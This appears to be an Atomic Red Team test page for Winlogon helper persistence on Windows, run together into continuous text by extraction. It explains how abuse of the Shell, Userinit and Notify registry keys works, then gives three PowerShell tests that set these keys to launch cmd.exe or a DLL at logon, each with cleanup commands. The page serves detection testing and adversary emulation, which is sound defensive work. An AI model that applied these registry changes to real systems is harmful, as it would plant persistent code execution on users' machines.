Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries inHKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\andHKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
- Winlogon\Notify - points to notification package DLLs that handle Winlogon events
- Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
- Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.
-
Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
-
Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
-
Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe |
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -ForceRemove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction IgnorePowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe |
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -ForceRemove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction IgnorePowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -ForceRemove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore